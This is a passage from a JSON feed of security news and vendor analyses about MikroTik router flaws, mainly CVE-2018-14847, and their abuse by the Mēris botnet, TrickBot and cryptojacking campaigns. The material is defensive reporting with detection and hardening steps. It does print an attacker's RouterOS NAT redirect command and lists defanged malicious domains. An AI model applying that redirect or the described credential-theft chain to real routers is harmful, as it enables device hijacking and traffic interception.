(MikroTik) and [CVE-2014-8361](<https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/>) are being highly used. One commonality among them is the sheer high number of devices which can be abused using the vulnerabilities. Hence, a security loophole in a big IoT vendor can be a more critical issue than a usual one.\u201d\n", "cvss3": {}, "published": "2018-12-20T20:41:46", "type": "threatpost", "title": "Huawei Router Flaw Leaks Default Credential Status", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2018-14847", "CVE-2018-7900"], "modified": "2018-12-20T20:41:46", "id": "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C", "href": "https://threatpost.com/huawei-router-default-credential/140234/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-09T23:38:13", "description": "The routers leveraged by the M\u0113ris botnet in a [massive distributed denial-of-service (DDoS) attack](<https://threatpost.com/yandex-meris-botnet/169368/>) against Russia\u2019s internet giant Yandex have also been the unwitting platform for numerous cyberattacks, researchers have found. This is due to a persistent vulnerable state that\u2019s difficult for organizations to wrangle, but easy for threat actors to exploit, they said.\n\nResearchers from Eclypsium took a deep dive into the feature-rich small office/home office (SOHO) and internet-of-things (IoT) devices [from Latvia-based company](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>) MikroTik, which number some 2 million in deployments.\n\nDue to the sheer number of devices in use, their high power and numerous known [vulnerabilities](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) within them, threat actors have been using MikroTik devices for years as the command center from which to launch numerous attacks, researchers said.\n\n## **The MikroTik Attack Surface**\n\nEclypsium researchers began exploring the how and why of the weaponization of MikroTik devices in September, based on previous research into how TrickBot threat actors used compromised routers as command-and-control (C2) infrastructure. Eclypsium analysts found that TrickBot also was able to fall back on MikroTik infrastructure after U.S. Cyber Command successfully [disrupted](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) its main infrastructure.\n\n\u201cThis made us want to better understand the MikroTik attack surface and how attackers might use them once compromised,\u201d they wrote.\n\nIn addition to their power, one of the chief reasons MikroTik devices are so popular with attackers is that they are, like many SOHO and IoT devices, vulnerable out of the box. They often come with default credentials of admin/empty password, and even devices that are intended for corporate environments come without default settings for the WAN port, researchers wrote.\n\nAdditionally, MikroTik devices often miss out on important firmware patches because their auto-upgrade feature is rarely turned on, \u201cmeaning that many devices are simply never updated,\u201d according to Eclypsium.\n\nThis has allowed CVEs dating back to 2018 and 2019 \u2014 one of which was used by in the Yandex attack \u2014 to remain unpatched on many devices and ripe for exploitation, researchers said. The bugs tracked as [CVE-2019-3977](<https://nvd.nist.gov/vuln/detail/CVE-2019-3977>), [CVE-2019-3978](<https://nvd.nist.gov/vuln/detail/CVE-2019-3978>), [CVE-2018-14847](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) and [CVE-2018-7445 ](<https://nvd.nist.gov/vuln/detail/CVE-2018-7445>)can all lead to pre-authenticated remote code execution (RCE) \u2014 and a complete takeover of a device.\n\nMikroTik devices also have \u201can incredibly complex configuration interface\u201d that invites easy mistakes from those setting them up, which allows attackers to easily discover and abuse them over the internet, researchers said.\n\n## **Multiple Cyberattack Scenarios**\n\n\u201cThe capabilities demonstrated in these attacks should be a red flag for enterprise security teams,\u201d researchers wrote in [a report](<https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/>) published Thursday. \u201cThe ability for compromised routers to inject malicious content, tunnel, copy or reroute traffic can be used in a variety of highly damaging ways.\u201d\n\nThese include the use of DNS poisoning to redirect a remote worker\u2019s connection to a malicious website or introduce a machine-in-the-middle attack; the use of well-known techniques and tools to \npotentially capture sensitive information or steal two-factor authentication (2FA) credentials; the tunneling of enterprise traffic to another location; or the injection of malicious content into valid traffic, researchers said.\n\nThen there was the M\u0113ris botnet attack \u2014 which happened soon after Eclypsium began its research. Requests used in the DDoS HTTP-pipelining attack on Russia\u2019s internet giant Yandex in September originated from MikroTik networking gear, with attackers exploiting a 2018 bug unpatched in the more than 56,000 MikroTik hosts involved in the incident.\n\nAnd, Eclypsium also found approximately 20,000 devices with proxies open, which were injecting different crypto-mining scripts into web pages.\n\n\u201cThese devices are both powerful, and as our research shows, often highly vulnerable,\u201d they noted, adding that MikroTik devices, in addition to serving SOHO environments, are regularly used by local Wi-Fi networks, which also attracts attention from attackers, they wrote.\n\nThreatpost has reached out to MikroTik for comment on the researchers\u2019 findings and conclusions.\n\n## **Tool to Mitigate Risk**\n\nResearchers used Shodan queries to build a dataset of 300 000 IP addresses vulnerable to at least one of the aforementioned RCE exploits and also tracked geographically where the devices were located, finding that they are \u201cparticularly widespread,\u201d they wrote. Researchers found that China, Brazil, Russia, Italy and Indonesia had the most total vulnerable devices, with the United States coming in at eight on the list.\n\nEclypsium has created a [freely available tool](<https://github.com/eclypsium/mikrotik_meris_checker>) that could allow network administrators to test their devices\u2019 vulnerability, in three ways: Identify MikroTik devices with CVEs that would allow the device to be taken over; attempt to log in with a given list of default credentials; and check for indicators of compromise of the M\u0113ris botnet.\n\nThe tool works across SSH, WinBox and HTTP API protocols, all of which the M\u0113ris malware uses, researchers said. Eclypsium recommended that enterprises using the tool only attempt to log into the MikroTik devices that they own and to take liability for their actions.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-12-09T15:56:16", "type": "threatpost", "title": "How MikroTik Routers Became a Cybercriminal Target", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2018-7445", "CVE-2019-3977", "CVE-2019-3978"], "modified": "2021-12-09T15:56:16", "id": "THREATPOST:89FA3268B259F5D59A0211160BD3B700", "href": "https://threatpost.com/mikrotik-routers-cybercriminal-target/176894/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:50:48", "description": "A new hacking technique used against vulnerable MikroTik routers gives attackers the ability to execute remote code on affected devices. The technique is yet another security blow against the MikroTik router family. Previous hacks have left the routers open to device failures, cyptojacking and network eavesdropping.\n\nThe hacking technique, found by Tenable Research and outlined on Sunday at DerbyCon 8.0 in Louisville, Kentucky, is tied to the existing directory traversal bug (CVE-2018-14847) found and patched in April. That vulnerability was rated medium in severity and impacted Winbox, which is a management component and a Windows GUI application for MikroTik\u2019s RouterOS software.\n\nTenable Research says it has found a new attack technique that exploits the same bug (CVE-2018-14847) that allows for unauthenticated remote code execution. \u201cBy exploiting the flaw, the remote attacker can get a root shell on the device as well as bypass the router\u2019s firewall, gain access to the internal network, and even load malware onto victims\u2019 systems undetected,\u201d Tenable Research said in a [blog post accompanying the presentation](<https://www.tenable.com/blog/tenable-research-advisory-multiple-vulnerabilities-discovered-in-mikrotiks-routeros>).\n\nThe underlying flaw is tied to a Winbox Any Directory File that allows threat actors to read files that flow through the router without authentication. The new technique, found by Jacob Baines, researcher at Tenable Research, goes one step further allowing an adversary to write files to the router. Baines also created a proof of concept of the attack outlined Sunday.\n\n\u201cThe licupgr binary has an sprintf that an authenticated user can use to trigger a stack buffer overflow. The sprintf is used on the following string:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/10/07185558/PoC_CVE_MikroTik.jpg>)\n\n\u201cWhere the user has control of the username and password strings, an authenticated user can exploit this to gain root access to the underlying system,\u201d he wrote.\n\nThis is as bad as it gets, Baines told Threatpost. \u201cThis bug was reported in April, but we are now able to show how an attacker can use it to get root shell on a system. It uses CVE-2018-14847 to leak the admin credentials first and then an authenticated code path gives us a back door.\u201d\n\nWhile MikroTik patched CVE-2018-14847 in early August, a recent scan by Tenable Research revealed only approximately 30 percent of vulnerable modems have been patched, which leaves approximately 200,000 routers vulnerable to attack. MikroTik\u2019s RouterOS powers the company\u2019s business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.\n\n\u201cBased on Shodan analysis, there are hundreds of thousands of MikroTik deployments worldwide, with strong concentrations in Brazil, Indonesia, China, the Russian Federation and India. As of the October 3, 2018, approximately 35,000 \u2013 40,000 devices display an updated, patched version,\u201d Tenable Research wrote.\n\nThe read version of the vulnerability is currently being exploited by a number of different campaigns. In August, [it was reported](<https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/>) 3,700 MikroTik routers were being abused in a cyptojacking campaign. [Last month](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>), 360 Netlab reported that 7,500 MikroTik were forwarding their owners\u2019 traffic to eavesdropping cybercriminals. MikroTik routers have also been targeted by threat actors behind the malware VPNFilter who also used CVE-2018-14847.\n\nTenable researcher Baines said he is not aware of the technique being exploited in the wild. He said MikroTik\u2019s patch for affected _[RouterOS versions 6.40.9, 6.42.7 and 6.43](<https://mikrotik.com/download/changelogs/bugfix-release-tree>)_ stops all attack techniques associated with CVE-2018-14847.\n\nOn Sunday, Tenable Research also announced it had discovered additional MikroTik RouterOS vulnerabilities. The vulnerabilities include a stack buffer overflow vulnerability ([CVE-2018-1156](<https://nvd.nist.gov/vuln/detail/CVE-2018-1156>)), a file upload memory exhaustion ([CVE-2018-1157](<https://nvd.nist.gov/vuln/detail/CVE-2018-1157>)), a www memory corruption ([CVE-2018-1159](<https://nvd.nist.gov/vuln/detail/CVE-2018-1159>)) and a recursive parsing stack exhaustion ([CVE-2018-1158](<https://nvd.nist.gov/vuln/detail/CVE-2018-1158>)).\n", "cvss3": {}, "published": "2018-10-08T00:07:04", "type": "threatpost", "title": "PoC Attack Escalates MikroTik Router Bug to \u2018As Bad As It Gets\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-1156", "CVE-2018-1157", "CVE-2018-1158", "CVE-2018-1159", "CVE-2018-14847"], "modified": "2018-10-08T00:07:04", "id": "THREATPOST:AEFF18A46C45DA195E53C21BB6714562", "href": "https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-03-16T15:46:57", "description": "Trickbot, a sophisticated trojan that has evolved significantly since its discovery in 2016, has continually expanded its capabilities and, even with [disruption efforts](<https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/>) and news of its infrastructure going offline, it has managed to remain one of the most persistent threats in recent years. The malware\u2019s modular nature has allowed it to be increasingly adaptable to different networks, environments, and devices. In addition, it has grown to include numerous plug-ins, access-as-a-service backdoors for other malware like Ryuk ransomware, and mining capabilities. A significant part of its evolution also includes making its attacks and infrastructure more durable against detection, including continuously improving its persistence capabilities, [evading researchers and reverse engineering](<https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/>), and finding new ways to maintain the stability of its command-and-control (C2) framework.\n\nThis continuous evolution has seen Trickbot expand its reach from computers to Internet of Things (IoT) devices such as routers, with the malware updating its C2 infrastructure to [utilize MikroTik devices and modules](<https://orangecyberdefense.com/uk/blog/cyberdefense/the-trickbot-and-mikrotik-connection/>). [MikroTik](<https://mikrotik.com/>) routers are widely used around the world across different industries. By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, Trickbot adds another persistence layer that helps malicious IPs evade detection by standard security systems.\n\nThe Microsoft Defender for IoT research team has recently discovered the exact method through which MikroTik devices are used in Trickbot\u2019s C2 infrastructure. In this blog, we will share our analysis of the said method and provide insights on how attackers gain access to MikroTik devices and use compromised IoT devices in Trickbot attacks.\n\nThis analysis has enabled us to develop a forensic tool to identify Trickbot-related compromise and other suspicious indicators on MikroTik devices. We [published this tool](<https://github.com/microsoft/routeros-scanner>) to help customers ensure these IoT devices are not susceptible to these attacks. We\u2019re also sharing recommended steps for detection and remediating compromise if found, as well as general prevention steps to protect against future attacks.\n\n_Figure 1. Trickbot attack diagram_\n\n## How attackers compromise MikroTik devices for Trickbot C2\n\nThe purpose of Trickbot for using MikroTik devices is to create a line of communication between the Trickbot-affected device and the C2 server that standard defense systems in the network are not able to detect. The attackers begin by hacking into a MikroTik router. They do this by acquiring credentials using several methods, which we will discuss in detail in the following section.\n\nThe attackers then issue a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2. MikroTik devices have unique hardware and software, RouterBOARD and RouterOS. This means that to run such a command, the attackers need expertise in RouterOS SSH shell commands. We uncovered this attacker method by tracking traffic containing these SSH shell commands.\n\n_Figure 2. Direct line of communication between the Trickbot infected device and the Trickbot C2_\n\n### Accessing the MikroTik device and maintaining access\n\nAttackers first need to access the MikroTik shell to run the routing commands. To do so, they need to acquire credentials. As mentioned earlier, based on our analysis, there are several methods that attackers use to access a target router:\n\n * **Using default ****MikroTik passwords.**\n * **Launching brute force attacks.** We have seen attackers use some unique passwords that probably were harvested from other MikroTik devices.\n * **Exploiting CVE-2018-14847 on devices with RouterOS versions older than 6.42. **This vulnerability gives the attacker the ability to read arbitrary files like _user.dat_, which contains passwords.\n\nTo maintain access, the attackers then change the affected router\u2019s password.\n\n### Redirecting traffic\n\nMikroTik devices have a unique Linux-based OS called RouterOS with a unique SSH shell that can be accessed through SSH protocol using a restricted set of commands. These commands can be easily identified by the prefix \u201c/\u201d. For example:\n \n \n /ip \n /system \n /tool\n\nThese commands usually won\u2019t have any meaning on regular Linux-based shells and are solely intended for MikroTik devices. We observed through Microsoft threat data the use of these types of commands. Understanding that these are MikroTik-specific commands, we were able to track their source and intent. For example, we observed attackers issuing the following commands:\n \n \n /ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=<infected device> dst-address=<real C2 address>\n\nFrom the command, we can understand the following:\n\n * A new rule, similar to iptables, is created\n * The rule redirects traffic from the device to a server\n * The redirected traffic is received from port 449 and redirected to port 80\n\nThe said command is a legitimate network address translation (NAT) command that allows the NAT router to perform IP address rewriting. In this case, it is being used for malicious activity. Trickbot is known for using ports 443 and 449, and we were able to verify that some target servers were identified as TrickBot C2 servers in the past.\n\nThis analysis highlights the importance of keeping IoT devices secure in today\u2019s ever evolving threat environment. Using Microsoft threat data, Microsoft\u2019s IoT and operational technology (OT) security experts established the exact methods that attackers use to leverage compromised IoT devices and gained knowledge that can help us better protect customers from threats.\n\n## Defending IoT devices against Trickbot attacks\n\nAs security solutions for conventional computing devices continue to evolve and improve, attackers will explore alternative ways to compromise target networks. Attack attempts against routers and other IoT devices are not new, and being unmanaged, they can easily be the weakest links in the network. Therefore, organizations should also consider these devices when implementing security policies and best practices.\n\n### An open-source tool for MikroTik forensics\n\nWhile investigating MikroTik and attacks in the wild, we observed several methods of attacking these devices in addition to the method we described in this blog. We aggregated our knowledge of these methods and known CVEs into an open-source tool that can extract the forensic artifacts related to these attacks.\n\nSome of this tool\u2019s functionalities include the following:\n\n * Get the version of the device and map it to CVEs\n * Check for scheduled tasks\n * Look for traffic redirection rules (NAT and other rules)\n * Look for DNS cache poisoning\n * Look for default ports change\n * Look for non-default users\n\nWe have [published the tool in GitHub](<https://github.com/microsoft/routeros-scanner>) and are sharing this tool with the broader community to encourage better intelligence-sharing in the field of IoT security and to help build better protections against threat actors abusing IoT devices.\n\n### How to detect, remediate, and prevent infections\n\nOrganizations with potentially at-risk MikroTik devices can perform the following detection and remediation steps:\n\n * Run the following command to detect if the NAT rule was applied to the device (completed by the tool as well):\n \n \n /ip firewall nat print\n\nIf the following data exists, it might indicate infection:\n \n \n chain=dstnat action=dst-nat to-addresses=<public IP address> \n to-ports=80 protocol=tcp dst-address=<your MikroTik IP> dst-port=449 \n chain=srcnat action=masquerade src-address=<your MikroTik IP>\n\n * Run the following command to remove the potentially malicious NAT rule:\n \n \n /ip firewall nat remove numbers=<rule number to remove>\n\nTo prevent future infections, perform the following steps:\n\n * Change the default password to a strong one\n * Block port 8291 from external access\n * Change SSH port to something other than default (22)\n * Make sure routers are up to date with the latest firmware and patches\n * Use a secure virtual private network (VPN) service for remote access and restrict remote access to the router\n\n### Protect IoT devices and IT networks with Microsoft Defender\n\nTo harden IoT devices and IT networks against threats like Trickbot, organizations must implement solutions that detect malicious attempts to access devices and raises alerts on anomalous network behavior. [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>) provides agentless, network-layer security that lets organizations deploy continuous asset discovery, vulnerability management, and threat detection for IoT, OT devices, and Industrial Control Systems (ICS) on-premises or in Azure-connected environments. It is updated regularly with indicators of compromise (IoCs) from threat research like the one described on this blog, and rules to detect malicious activity.\n\nMeanwhile, [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>) protects against attacks related to highly modular, multi-stage malware like Trickbot by coordinating threat data across identities, endpoints, cloud apps, email, and documents. Such cross-domain visibility allows Microsoft 365 Defender to comprehensively detect and remediate Trickbot\u2019s end-to-end attack chain\u2014from malicious attachments and links it sends via emails to its follow-on activities in endpoints. Its rich set of tools like [advanced hunting](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/advanced-hunting-overview?view=o365-worldwide>) also lets defenders surface threats and gain insights for hardening networks from compromise.\n\nIn addition, working with the Microsoft Defender for IoT Research Team, RiskIQ identified compromised MikroTik routers acting as communication channels for Trickbot C2 and created detection logic to flag devices under threat actor control. [See RiskIQ\u2019s article](<https://community.riskiq.com/article/111d6005>).\n\nTo learn more about securing your IoT and OT devices, explore [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>).\n\n**_David Atch_**_, Section 52 at Microsoft Defender for IoT_ \n**_Noa Frumovich_**_, Section 52 at Microsoft Defender for IoT_ \n**_Ross Bevington_**_, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Uncovering Trickbot\u2019s use of IoT devices in command-and-control infrastructure](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2022-03-16T15:00:00", "type": "mmpc", "title": "Uncovering Trickbot\u2019s use of IoT devices in command-and-control infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-16T15:00:00", "id": "MMPC:B4569A8CBDA7CA5A51F286861830C71B", "href": "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:40:53", "description": "[](<https://thehackernews.com/images/-tskBVOxjDJI/W45Vz--31HI/AAAAAAAAyBs/H6uuVu6zytoo-8uo83JwzA0ZohSApKWAACLcBGAs/s728-e100/mikrotik-router-hacking-attack.png>)\n\nLast month we reported about a widespread crypto-mining malware campaign that [hijacked over 200,000 MikroTik routers](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) using a previously disclosed vulnerability revealed in the [CIA Vault 7 leaks](<https://thehackernews.com/2017/03/wikileaks-cia-vault7-leak.html>). \n \nNow Chinese security researchers at Qihoo 360 Netlab have [discovered](<https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/>) that out of 370,000 potentially vulnerable MikroTik routers, more than 7,500 devices have been compromised to enable Socks4 proxy maliciously, allowing attackers to actively eavesdrop on the targeted network traffic since mid-July. \n \nThe vulnerability in question is Winbox Any Directory File Read (CVE-2018-14847) in MikroTik routers that was found exploited by the [CIA Vault 7 hacking tool](<https://thehackernews.com/2018/06/cia-hacking-tools.html>) called [Chimay Red](<https://github.com/BigNerd95/Chimay-Red>), along with another MikroTik's Webfig remote code execution vulnerability. \n \nBoth Winbox and Webfig are RouterOS management components with their corresponding communication ports as TCP/8291, TCP/80, and TCP/8080. Winbox is designed for Windows users to easily configure the routers that download some DLL files from the router and execute them on a system. \n \nAccording to the researchers, more than 370,000 of 1.2 million MikroTik routers are still vulnerable to the CVE-2018-14847 exploit, even after the vendor has already rolled out security updates to patch the loophole. \n \nNetlab researchers have identified malware exploiting the CVE-2018-14847 vulnerability to perform various malicious activities, including CoinHive mining code injection, silently enabling Socks4 proxy on routers, and spying on victims. \n \n**CoinHive Mining Code Injection \u2014 **After enabling the Mikrotik RouterOS HTTP proxy, the attackers redirect all the HTTP proxy requests to a local HTTP 403 error page which injects a link for web mining code from Coinhive. \n\n\n> \"By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices,\" the researchers explain.\n\n> \"What is disappointing for the attacker though, the mining code does not work in this way, because all the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs set by attackers themselves.\"\n\n[](<https://thehackernews.com/images/-y9S_2Ccu0rs/W45MTZ68XGI/AAAAAAAAyBg/1J7kuWQ08-AR8Hs42AJUXgRvBYlDp5ysACLcBGAs/s728-e100/mikrotik-router-hacking-attack.png>)\n\n**Maliciously Enabling Sock4 Proxy** **\u2014 **Silently enabling the Socks4 port or TCP/4153 on victims device allows an attacker to gain control of the device even after it has been rebooted (IP change) by periodically reporting its latest IP address to the attacker's URL. \n \nAccording to the researchers, at present, a total of 239,000 IP addresses are confirmed to have Socks4 proxy enabled maliciously, eventually allowing attackers to continuously scan more MikroTik RouterOS devices using these compromised Socks4 proxy. \n \n**Eavesdropping on Victims \u2014** Since the MikroTik RouterOS devices allow users to capture packets on the router and forward them to the specified Stream server, attackers are forwarding the traffic from compromised routers to IP addresses controlled by them. \n\n\n> \"At present, a total of 7.5k MikroTik RouterOS device IPs have been compromised by the attacker, and their TZSP traffic is being forwarded to some collecting IP addresses,\" the researchers say.\n\n> \"We also noticed the SNMP port 161 and 162 are also top on the list. This deserve some questions, why the attacker is paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users' network SNMP community strings?\"\n\nThe victims are spread across various countries Russia, Iran, Brazil, India, Ukraine, Bangladesh, Indonesia, Ecuador, the United States, Argentina, Colombia, Poland, Kenya, Iraq, and some European and Asian countries, with Russia being the most affected. \n \nNetlab did not share the IP addresses of the victims to the public for security reasons but said that relevant security entities in affected countries can contact the company for a full list of infected IP addresses. \n \nThe best way to protect yourself is to PATCH. MikroTik RouterOS users are highly recommended to update their devices and also check if the HTTP proxy, Socks4 proxy, and network traffic capture function are being maliciously exploited. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-09-04T09:53:00", "type": "thn", "title": "Thousands of MikroTik Routers Hacked to Eavesdrop On Network Traffic", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-09-04T09:53:15", "id": "THN:31DAF3FB72A6AB73A54307C968C6570C", "href": "https://thehackernews.com/2018/09/mikrotik-router-hacking.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:37:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhrQSwzO7KEvdvTfdyIeP543kn1Qr0VJBUyRqyXqgfP0hCansX62NjkJQByAjcyCGsNS3K0FqxLXVKIXsuLKO2MRtP6XG3pfLQlxJeBXu9ahcLMROkj1SlcUhQuH_Vb-quc0rkPxaHmwhClG-aFNuroc6WSbSCewRriPJMXwCRqZkHGccZlsAQVJizW/s728-e100/mikrotik-router-hacking-attack.png>)\n\nVulnerable routers from MikroTik have been misused to form what cybersecurity researchers have called one of the largest botnet-as-a-service cybercrime operations seen in recent years. \n\nAccording to a new piece of research published by Avast, a cryptocurrency mining campaign leveraging the new-disrupted [Glupteba botnet](<https://thehackernews.com/2021/12/google-disrupts-blockchain-based.html>) as well as the infamous TrickBot malware were all distributed using the same command-and-control (C2) server.\n\n\"The C2 server serves as a botnet-as-a-service controlling nearly 230,000 vulnerable MikroTik routers,\" Avast's senior malware researcher, Martin Hron, [said](<https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/>) in a write-up, potentially linking it to what's now called the M\u0113ris botnet.\n\nThe botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers ([CVE-2018-14847](<https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html>)), enabling the attackers to gain unauthenticated, remote administrative access to any affected device. Parts of the M\u0113ris botnet were [sinkholed](<https://rt-solar.ru/events/news/2343/>) in late [September 2021](<https://therecord.media/russian-security-firm-sinkholes-part-of-the-dangerous-meris-ddos-botnet/>).\n\n\"The [CVE-2018-14847](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) vulnerability, which was publicized in 2018, and for which MikroTik issued a fix for, allowed the cybercriminals behind this botnet to enslave all of these routers, and to presumably rent them out as a service,\" Hron said.\n\nIn attack chain observed by Avast in July 2021, vulnerable MikroTik routers were targeted to retrieve the first-stage payload from a domain named bestony[.]club, which was then used to fetch additional scripts from a second domain \"globalmoby[.]xyz.\"\n\nInteresting enough, both the domains were linked to the same IP address: 116.202.93[.]14, leading to the discovery of seven more domains that were actively used in attacks, one of which (tik.anyget[.]ru) was used to serve Glupteba malware samples to targeted hosts.\n\n\"When requesting the URL https://tik.anyget[.]ru I was redirected to the https://routers.rip/site/login domain (which is again hidden by the Cloudflare proxy),\" Hron said. \"This is a control panel for the orchestration of enslaved MikroTik routers,\" with the page displaying a live counter of devices connected into the botnet.\n\nBut after details of the M\u0113ris botnet entered [public domain](<https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html>) in early September 2021, the C2 server is said to have abruptly stopped serving scripts before disappearing completely.\n\nThe disclosure also coincides with a [new report](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>) from Microsoft, which revealed how the TrickBot malware has weaponized MikroTik routers as proxies for command-and-control communications with the remote servers, raising the possibility that the operators may have used the same 